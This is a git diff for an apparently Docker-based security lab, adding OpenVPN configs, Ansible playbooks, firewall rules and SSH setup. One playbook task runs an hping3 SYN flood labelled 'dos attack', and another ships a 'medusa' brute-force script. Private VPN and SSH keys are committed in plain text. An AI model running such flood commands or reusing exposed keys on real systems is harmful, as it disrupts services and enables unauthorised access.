192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCUA5v4Y7WOoL68 +06Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTkaDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcx +CbQkr4xTp9ZU7q1GcKEvvTu4f392XaRwVZFfWSW6DFbNVa11BogtzOym6+t6Datk +NP+2Luo2vV4fHwqSXI8DYcNijxkULtUvwZowdJhSiptA6uGZi9FlS0DKx3ux2VK3 +ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3L +CLn6iQKbdQV1p1sXcnjatYeXcglBTtwPu2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA +2vFPYMnXAgMBAAECggEBAJOgKe8K2+l+j97bpTjDbu9pdj7JBJ8MlnpRFFrUpCw3 +RgkdnDbk1WFfhYycj44PE/njAOzexQfZ4VYKnJ6+bFJ/orkhOLd53Ho13hu9Jo8T +BNB5t72Gt6chaW3xF0kSE77ClgJCaaFZguk2Jxk5H6crJnYZyryCDq3L00k4+kVy +kCMeXGzCrlBxtucYQbVGm7F6SUQEXvyv2eCStRuwVu2gnHqckrnX1HkQ3fNmmaIv +8tqCbqbh5JBu+6l4R0xOArOGCIORNlQC5xtXFevwV7o6ZCGf64n9vvkJ02lgosUp +EUmdoAxha2CKeH3BA/ZKH8VxyfZuNgFD1/avQXQ+RWkCgYEAxJ5xfSvcvkY32HEA +6UNAUOdSLXCM+mJR0MKE+zFGAqx9auHKasOk+IKo9v/4/PgZnSjyI3WzHQ2GmJqO +iLZrCJWr60ictoBDw62ZbVWuRoJUwAYe+icLoQC/fBIuwJRXnBqGqIH0jTLnQG+O +69rSFVfEWwLPTVxSFuYI8h9DOJsCgYEAwLdK/Axy/lpy6vHphTvgihNJ1Y2lNpWO +cgb4mURMixojvY7zRaLxzbmpBU1KpfK0z+jorjGTnuQ2RTuJ9/xRKGRd6aaJfQKG +x+AiKNrslltYYo74U42Mhw810Kq/RlmdvLfb2ify9eUtuEtWhr7q95mbWLfmnCBP +CRgR8ML68XUCgYEAvx3f5LK4+/7XE70sDJEBOGLRfzey4UKmkkwx5NTNX5X4xua4 +0bRga+rdgFHp3ULv6tK9IviqZOgb18QMHhlqysppdOd85OyicdcRlrQ9FW5kIM8S +V0eSxyop9tjZtvm6exNRpwPDCWjcXcbSXrGxmWtZgrmldWXyqS1qrqbyuVcCgYBN +IM6E46KeQ6rcducj6JvsBt409tSZbO+umTWjeZ88yMBnHDAmvZkS4exQb+ehVOqi +jy+Yj8TqAaHqwXJtanE8vjaLzZgXDQzOL9jcCwpG/tX31Ap0viDw6Nh74+pbiIBF +yDvYKsblPMy4hoZhtUUqxTJUJn3IHHIlTJnZht+SBQKBgF4lQMpf1acfm4aODCS9 +WIArMeifjSf2m1X4qmKf+hWkha7Aq4JHAVNDCF77ktLjo72la/647PPn1Yt1tgNE +T34bY/+iTyLmOULD3EPwSKU+MsVXWUnDn6gksEix+4qCxGVR9U5g/rJc0isAMr4R +X0zX3DnM7OioFwjGVjmw4OlP +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDWDCCAkCgAwIBAgIRALIrjDtKnvOlKzrDEsEquO0wDQYJKoZIhvcNAQELBQAw +FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjIxWhcNMjQwMTA4 +MDQ1MjIxWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzQwggEiMA0GCSqGSIb3DQEBAQUA +A4IBDwAwggEKAoIBAQCUA5v4Y7WOoL6806Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTk +aDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcxCbQkr4xTp9ZU7q1GcKEvvTu4f392XaRw +VZFfWSW6DFbNVa11BogtzOym6+t6DatkNP+2Luo2vV4fHwqSXI8DYcNijxkULtUv +wZowdJhSiptA6uGZi9FlS0DKx3ux2VK3ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw +51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3LCLn6iQKbdQV1p1sXcnjatYeXcglBTtwP +u2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA2vFPYMnXAgMBAAGjgaIwgZ8wCQYDVR0T +BAIwADAdBgNVHQ4EFgQUNdDrzlEMV2SXtnLJ7Z/lzuq33mkwUQYDVR0jBEowSIAU +KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB +ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV +HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAAfcg0QmBzR0ACiFzCAa7cpJ3Lzt +/v7ooR9zUUJ40KkglWA0cAZaEhRRwpFzqYwKKmEgzWQtHTvS0sM/674RGA4FredV +iYYgZdmnxIvDAiWMIL765iK0NCK/qLdPTLfmELDJlf3bOCN/s8QwazUKbUPgWZJF +QsGMFuB+xXDFaYLQt/vO+aHxpDUe7mB4CNL4tUkejq16LMhJ2XQShfVqAJ0IhrX7 +NmMDYK+qf788oTBABB6ROJTySJAgeQ34XGBYbKKdK6UMqi7VIkW5BNfAhusdFkhE +zep52EcL95JGXaCO/NAwdsVmYZMiko/GD8Ks0XrXO+HZLc9DUlLtOBcvfVY= +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq +hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_5.ovpn b/project/sec_vpn_5.ovpn new file mode 100644 index 0000000..b9e0159 --- /dev/null +++ b/project/sec_vpn_5.ovpn @@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCg9D/IFmmR74x7 +kTMBpnz7/xRczL1SLcvqk2EgCwFsHHHvtEEu/wdEgJLKoaF4gTpPQ4NaZ51e5XsG +d7CHwg9B4EW5bydfw16L9V7X54C/Abpo/LS/kT1sLbBMxR5nLuU0WarokE1ivQ2q +gOFsrlPfvYDkhuxGZ6TBMZR4WQC10D6AgPWXF3L0Ld3GlxzzKNDe6zwynEVnNw2w +LO0KmZ6i5x2dkvcMn3zwgEy1RTS2OF6U9qpWadmjSsND7caR4Am4XKSYNuI4Dsyz +QJEMctbOrMTTeNIYJKuAnX1Yp4dXK5cN7YT5hnJfnBr1H3vkmUh1oaYBToOQhLCM +rwjgvTH3AgMBAAECggEAPxU74loWamIu90dDbIQqPEIPYwfDs+/LGldFG9/0YMEN +TtuhKKA/4vNZlR2gQbC0f9iAJPCzVzwt6a0DfVHr1O/no/QSxI+4ALbcw1Yyuaod +u4Q/+00be8i0boJblillIA181MWp7ucV8hutPoFc0jZdzDOtazK3+hhKjpijlJ44 +lBPRcbQGEPrYs2TEEJ0hWHwr0himlId2lC11wygcu1n4TdsoFAScccPVpCbqOKrq +SwbBeaC+HWO6J30b3dsQ38ZOygMdB9cen2ItQAZdW6aIqgSu6gF/2IhM3JACPuO9 +VJj56FAeetZgLwO6c9Vii98UO2Hm+HFhyI9WnAaOoQKBgQDQi2EyGnvJe6WsfLoh +OCh3vvM4F5pdo98cRhrm/SvhyF/OvL8H50hbJtDs4fEWGgJIV8xOk+NSrqJX20k7 +Thpge7EMRqZjkXlZvKIq+9w+aBDKyb1kmuO/BadJh/Zlt9h1jctEc00IPzypfip1 +NiPQe9Vd0NZeL1dFWnoxMhr2/wKBgQDFlIZNzo7eBjT5rEcm7nn63Ylsq+p6LezP +1KwBx9f7XnVU+r8GansvrWrPgqyJ7w/EGHA3/wUk9qw2HZoqUh1W2GpPBYpx0wNV +1g9kjEG056gnFMgTbMjojZ4auxiEFSYo5G8Mi8kLS6OQbUAotieWJFGiCvlUGWUh +Gwh1vNB9CQKBgFG6jfjo0CKCRsd2iiuCqrljKEaPWXvhQQr/noNwLMZrlMCcz/D0 +/zJZ3/81/RnAT6yyW+tfofNBZXYxBl4rmcK+NwCsn4Dd/kTg3F0kH4iFmC8hKQxI +d4DhYlI66qGqjzZiv4qv9TyKK+fw/gq5kQefwFroAVsgCn+vmbu1+0NZAoGAYHqw +Qlo1BVG+mJR5ghc9VTTMoFYqf1LhqnLNM2lknAh5/u8aTIW+dX+XApFqs0gbSMQu +OAm9d1lEqoA2AahrTzcKYl/wRLinjkii55RdmXrtb3gEYwfh6z0MET1/MTAqnBk/ +6L5xg6SB0Eqo47hfCD/f5OK68UgdS9cpgGSc4hECgYAH2bc7xDulyt5tIknzTfRv +iwTipQBJPyK+OGamw83B9l/1I+QJ9EmB+Zn7JmPiWqhViD9V5GlmbUBqiarJXF5Z +mW7VY2BsLsKOuGKprcJO83XpM8LtW6bBlCtfU8hAHeoBX0j8F99isN5ZmwnEHLLY +awaMoHH/Znwdrgg2E7NBwA== +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDWDCCAkCgAwIBAgIRAOKsUA1kgRB5+57ZaH6Wb7UwDQYJKoZIhvcNAQELBQAw +FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjI4WhcNMjQwMTA4 +MDQ1MjI4WjAUMRIwEAYDVQQDDAlzZWNfdnBuXzUwggEiMA0GCSqGSIb3DQEBAQUA +A4IBDwAwggEKAoIBAQCg9D/IFmmR74x7kTMBpnz7/xRczL1SLcvqk2EgCwFsHHHv +tEEu/wdEgJLKoaF4gTpPQ4NaZ51e5XsGd7CHwg9B4EW5bydfw16L9V7X54C/Abpo +/LS/kT1sLbBMxR5nLuU0WarokE1ivQ2qgOFsrlPfvYDkhuxGZ6TBMZR4WQC10D6A +gPWXF3L0Ld3GlxzzKNDe6zwynEVnNw2wLO0KmZ6i5x2dkvcMn3zwgEy1RTS2OF6U +9qpWadmjSsND7caR4Am4XKSYNuI4DsyzQJEMctbOrMTTeNIYJKuAnX1Yp4dXK5cN +7YT5hnJfnBr1H3vkmUh1oaYBToOQhLCMrwjgvTH3AgMBAAGjgaIwgZ8wCQYDVR0T +BAIwADAdBgNVHQ4EFgQUOCps54FTjSKrRlht5Wq5H5cktQUwUQYDVR0jBEowSIAU +KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB +ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV +HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAKERF5PiEx71LlLgjtn55HYRUhPI +SYRlcTaaKjONY4fpAM4HQx51Q1GKl8AviTKEHa+j4zqaIVdNj5xnKtv5EdEPcVHp +f7Ifc1D/8D9ulFyaC8M1GyfbUr4rSgfkQDCcn20rdt8ftIfq+MdcBw078/9ql7e1 +w+sD7HgOWR/sOP8tXiHHmy9j9kw/a8SNOROqmjrGl5bRaSkEwDQjoTP28Cqig2Jy +5yXav/Ql6+YlFkCaDyiSbMpVz5PNc09m91ZJvw+ki6Ox/SKDAQGBxx4/M8OkBv3W +YEdf/Bgd4if5nu89zbO0yMoYXRNtzVoquXc59CSAcnIUD9x0qqFCSStlrnE= +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq +hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/second_script.sh b/project/second_script.sh new file mode 100755 index 0000000..655a74c --- /dev/null +++ b/project/second_script.sh @@ -0,0 +1,2 @@ +ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass + diff --git a/project/sshkey_script.sh b/project/sshkey_script.sh new file mode 100755 index 0000000..227ec77 --- /dev/null +++ b/project/sshkey_script.sh @@ -0,0 +1,4 @@ +#!/bin/bash +ssh-keygen +ssh-copy-id docker@172.21.0.6 + diff --git a/project/test-ping.retry b/project/test-ping.retry new file mode 100644 index 0000000..75048d0 --- /dev/null +++ b/project/test-ping.retry @@ -0,0 +1,5 @@ +172.27.0.2 +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/project/test-ping.yml b/project/test-ping.yml new file mode 100644 index 0000000..c08c86f --- /dev/null +++ b/project/test-ping.yml @@ -0,0 +1,27 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + + + tasks: + + + + # ping async + - name: pingtome + command: ping 10.80.0.2 + async: 30 + poll: 0 + + + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/project/test.retry b/project/test.retry new file mode 100644 index 0000000..75048d0 --- /dev/null +++ b/project/test.retry @@ -0,0 +1,5 @@ +172.27.0.2 +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/project/test.yml b/project/test.yml new file mode 100644 index 0000000..bbb2829 --- /dev/null +++ b/project/test.yml @@ -0,0 +1,113 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + + + tasks: + + + + # make directory + + - name: make dir for data + become: true + file: + path: "/var/lab/playground/playground-readmongo" + state: directory + owner: docker + group: docker + mode: '0777' + + # pare google.com + +# - name: google.com +# become: yes +# become_user: "{{ user }}" +# command: curl http://www.google.com +# ignore_errors: yes +# register: configwww + +# - name: ls configwww +# debug: var=configwww.stdout_lines + + + # rm dir + +# - name: remove dir +# become: yes +# become_user: "{{ user }}" +# command: rmdir new_dir +# ignore_errors: yes +# register: rmvdir + + +# - name: ls rmvdir +# debug: var=rmvdir.stdout_lines + + # transfer script iptables gia er. 1 + + - name: Transfer script iptables_rules. + copy: src=iptables_rules.sh dest=/home/docker mode=0777 + + # transfer script fail2ban gia er.2 + + - name: Transfer script fail2ban. + copy: src=fail2ban_script.sh dest=/home/docker mode=0777 + + # install openvpn gia er.4 + - name: Ansible apt install openvpn. + become: true + apt: + name: openvpn + state: present + update_cache: true + + # install fail2ban gia er.2 + - name: Ansible apt install fail2ban. + become: true + apt: + name: fail2ban + state: present + update_cache: true + + # ls -al for testing + + - name: ls -al + become: yes + become_user: "{{ user }}" + command: ls -al #/etc + ignore_errors: yes + register: config + + + - name: ls config + debug: var=config.stdout_lines + + + + # netstat -antlupe + +# - name: netstat +# become: yes +# become_user: "{{ user }}" +# command: netstat -antlupe +# ignore_errors: yes +# register: ant + + + +# - name: ls ant +# debug: var=ant.stdout_lines + + + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/project/test2.retry b/project/test2.retry new file mode 100644 index 0000000..db790ad --- /dev/null +++ b/project/test2.retry @@ -0,0 +1,4 @@ +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/project/test2.yml b/project/test2.yml new file mode 100644 index 0000000..6c494e5 --- /dev/null +++ b/project/test2.yml @@ -0,0 +1,76 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + tasks: + + + # ls -al test + +# - name: ls -al +# become: yes +# become_user: "{{ user }}" +# command: ls -al +# ignore_errors: yes +# register: config + +# - name: ls config +# debug: var=config.stdout_lines + + + # transfer script update + + - name: Transfer script. + copy: src=script_update.sh dest=/home/docker mode=0777 + + # exec script + - name: Exec script_update. + command: sh /home/docker/script_update.sh + + # transfer script iptables + +# - name: Transfer script iprules. +# copy: src=iptables_rules.sh dest=/home/docker mode=0777 + + # transfer script imedusa + + - name: Transfer script medusa. + copy: src=medusa_script.sh dest=/home/docker mode=0777 + + # transfer script fail2ban + +# - name: Transfer script fail2ban. +# copy: src=fail2ban_script.sh dest=/home/docker mode=0777 + + # transfer script sshkey_script + +# - name: Transfer script sshkey. +# copy: src=sshkey_script.sh dest=/home/docker mode=0777 + + + # install hping3 + - name: Ansible apt install hping3. + become: true + apt: + name: hping3 + state: present + update_cache: true + + # install sshpass + - name: Ansible apt install sshpass. + become: true + apt: + name: sshpass + state: present + update_cache: true + + + # refresh + - name: Refresh connection + meta: clear_host_errors + + diff --git a/project/test3.retry b/project/test3.retry new file mode 100644 index 0000000..f23db12 --- /dev/null +++ b/project/test3.retry @@ -0,0 +1,4 @@ +172.29.0.3 +172.29.0.4 +172.29.0.5 +172.29.0.6 diff --git a/project/test3.yml b/project/test3.yml new file mode 100644 index 0000000..c4492c5 --- /dev/null +++ b/project/test3.yml @@ -0,0 +1,60 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + + + tasks: + + + + + # ls -al + +# - name: ls -al +# become: yes +# become_user: "{{ user }}" +# command: ls -al +# ignore_errors: yes +# register: config2 + + +# - name: ls config2 +# debug: var=config2.stdout_lines + + # dos attack async + - name: dos attack + command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y + async: 120 + poll: 0 + + + + + # ls -al + +# - name: ls -al +# become: yes +# become_user: "{{ user }}" +# command: ls -al +# ignore_errors: yes +# register: config3 + + + - name: ls config3 + debug: var=config3.stdout_lines + + + + + + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/project/test_fail2ban.retry b/project/test_fail2ban.retry new file mode 100644 index 0000000..75048d0 --- /dev/null +++ b/project/test_fail2ban.retry @@ -0,0 +1,5 @@ +172.27.0.2 +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/project/test_fail2ban.yml b/project/test_fail2ban.yml new file mode 100644 index 0000000..1b1540f --- /dev/null +++ b/project/test_fail2ban.yml @@ -0,0 +1,21 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + + + tasks: + + # exec script fail2ban + - name: Exec fail2ban_script. + command: sh /home/docker/fail2ban_script.sh + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/project/test_iptables_rules.retry b/project/test_iptables_rules.retry new file mode 100644 index 0000000..75048d0 --- /dev/null +++ b/project/test_iptables_rules.retry @@ -0,0 +1,5 @@ +172.27.0.2 +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/project/test_iptables_rules.yml b/project/test_iptables_rules.yml new file mode 100644 index 0000000..d9cfe44 --- /dev/null +++ b/project/test_iptables_rules.yml @@ -0,0 +1,21 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + + + tasks: + + # exec script iptables + - name: Exec iptables_rules.sh. + command: sh /home/docker/iptables_rules.sh + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/sec_bootstrap b/sec_bootstrap new file mode 100755 index 0000000..d38b273 --- /dev/null +++ b/sec_bootstrap @@ -0,0 +1,72 @@ +#!/bin/sh + +ROLE="undefined" +MPI_MASTER_SERVICE_NAME="sec_master" +MPI_WORKER_SERVICE_NAME="sec_worker" +HOSTNAMES="/etc/nethosts" + +####################### +# ARGUMENTS PARSER + +while [ "$1" != "" ]; +do + PARAM=$(echo "$1" | awk -F= '{print $1}') + VALUE=$(echo "$1" | awk -F= '{print $2}') + + case $PARAM in + role) + [ "$VALUE" ] && ROLE=$VALUE + ;; + + sec_master_service_name) + [ "$VALUE" ] && MPI_MASTER_SERVICE_NAME=$VALUE + ;; + + sec_worker_service_name) + [ "$VALUE" ] && MPI_WORKER_SERVICE_NAME=$VALUE + ;; + *) + echo "ERROR: unknown parameter \"$PARAM\"" + exit 1 + ;; + esac + shift +done + + + +cat > /etc/opt/service_names <<- EOF +MPI_MASTER_SERVICE_NAME=${MPI_MASTER_SERVICE_NAME} +MPI_WORKER_SERVICE_NAME=${MPI_WORKER_SERVICE_NAME} +EOF + +case $ROLE in + "master") + + # Auto update default host file in background and dumb all output + auto_update_hosts "${HOSTNAMES}" > /dev/null 2>&1 & + + # Start ssh server + /usr/sbin/sshd -D + ;; + + + "worker") + + # Start ssh server in background + /usr/sbin/sshd -D & + + # Keep trying to connect to master node and stay there indefinitely so that master node can see + # the connected hosts that are ready for MPI work + while sleep 1 + do + # shellcheck disable=SC2086 + ssh -T -o "StrictHostKeyChecking no" \ + -i "${USER_HOME}/.ssh/id_rsa" \ + ${USER}@${MPI_MASTER_SERVICE_NAME} \ + "tail -f /dev/null" + done + ;; + *) + echo 'role argument only accepts "master" or "worker"' +esac diff --git a/shorewall/interfaces b/shorewall/interfaces new file mode 100755 index 0000000..a475e93 --- /dev/null +++ b/shorewall/interfaces @@ -0,0 +1,6 @@ +### Comments, comments, and more comments. +# +#ZONE INTERFACE BROADCAST OPTIONS +# +net eth0 detect tcpflags,nosmurfs +#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE diff --git a/shorewall/policy b/shorewall/policy new file mode 100755 index 0000000..58798a0 --- /dev/null +++ b/shorewall/policy @@ -0,0 +1,11 @@ +### Comments, comments, and more comments. +#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST +# +net fw ACCEPT +fw net ACCEPT + +net all DROP + +# THE FOLLOWING POLICY MUST BE LAST +all all REJECT info +#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE diff --git a/shorewall/rules b/shorewall/rules new file mode 100755 index 0000000..d59920c --- /dev/null +++ b/shorewall/rules @@ -0,0 +1,11 @@ +#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ +# PORT PORT(S) DEST LIMIT GROUP +#ACCEPT net fw tcp 80 +#ACCEPT fw net tcp 80 +#ACCEPT net fw udp 53 +#ACCEPT fw net udp 53 +#REJECT net fw udp 53 +#REJECT fw net udp 53 +#ACCEPT net:14.15.16.112/27 fw icmp 8 + +#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE diff --git a/shorewall/zones b/shorewall/zones new file mode 100755 index 0000000..62437de --- /dev/null +++ b/shorewall/zones @@ -0,0 +1,6 @@ +### Comments, comments, and more comments. +#ZONE TYPE OPTIONS IN OUT +# OPTIONS OPTIONS +fw firewall +net ipv4 +#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE diff --git a/ssh/id_rsa b/ssh/id_rsa new file mode 100755 index 0000000..d88fa3c --- /dev/null +++ b/ssh/id_rsa @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEAoKG1DtjMXHDJfF59Y5nO7Yl38fkjRL1LQhF7RZKbGScWBNIW +foAS0wrd3wUnd5YMtIeiBj98H+V8IEn0ChAAxGfHXqqmmYlU6ABESINob+h70Bnm +UwiRbRnA64o3d9+cz2T8YLf+1p7///Z8LA8U+7rS+kvKvtYCQ9llDAxtbe39CxCs +2HASam3U6VArq9SdSqph5MudBaYhaxx4V8VDdXEhG2pimlh8e7zdPZ8AYbYLLDhq +Ytd+wn9azLXPQ3w/vC+Pn4taUBYnlERDY45vaVsPdnR+ao9ckMLUS6EwJVQmgMzB +2yyNCbPQYvRPL0rxoGstfCmmjY3EzOh6kEA6wwIDAQABAoIBAHqrAxnTdj0h5LyV +bCwjyWKdGHwxRj24UUCjGQCIdOlAcBA+X+863yVLpyQpS3qHnCxBZ/pdgOza02/V +CgilL/DNT/N7Xr7hoXWKvpqhv5+2atcA8GN4p5YplKpLYxCoM5guBo3V9UbxJY7T +LQB4hA25HmUGfE5AIHqwCfqpgufvIO1enhe1Vh/6l1FJqJuNj2pBGeXOyOMV95GN +xC5/BVytJIx2Rts5qtwpt5iPE3pKdsrWc71qACxk3dG8h9OZnuE3vuCg/Wp8jdwk 